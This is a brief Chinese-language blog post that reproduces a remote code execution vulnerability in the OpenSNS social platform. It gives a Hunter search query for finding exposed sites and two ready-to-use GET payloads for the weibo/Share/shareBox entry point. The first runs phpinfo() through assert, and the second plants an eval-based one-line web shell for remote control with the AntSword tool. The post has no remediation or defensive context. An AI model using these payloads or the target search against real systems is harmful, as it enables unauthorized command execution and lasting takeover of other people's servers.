Babing
Published on 2024-08-30 / 0 Visits
0
0

O2-1OpenSNS-RCE

O2-1OpenSNS-RCE

漏洞描述:

opensns是基于tp3开发的,仅支持php5,漏洞入口在 weibo/share/sharebox,通过 get请求提交query参数,存在变量覆盖的漏洞,攻击者通过漏洞发送特定的请求包可以执行任意命令。

网站图片:

image-20240619145234052

网络测绘:

Hunter 语法:

  • hunterapp.name=“OpenSNS”

漏洞复现:

payload:

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule->_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=phpinfo()

效果图:
image-20240619145431237
使用一句话木马并采用蚁剑连接

/index.php?s=weibo/Share/shareBox&query=app=Common%26model=Schedule%26method=runSchedule%26id[status]=1%26id[method]=Schedule-%3E_validationFieldItem%26id[4]=function%26[6][]=%26id[0]=cmd%26id[1]=assert%26id[args]=cmd=@eval($_POST[Haaa])

image-20240619145443884


Comment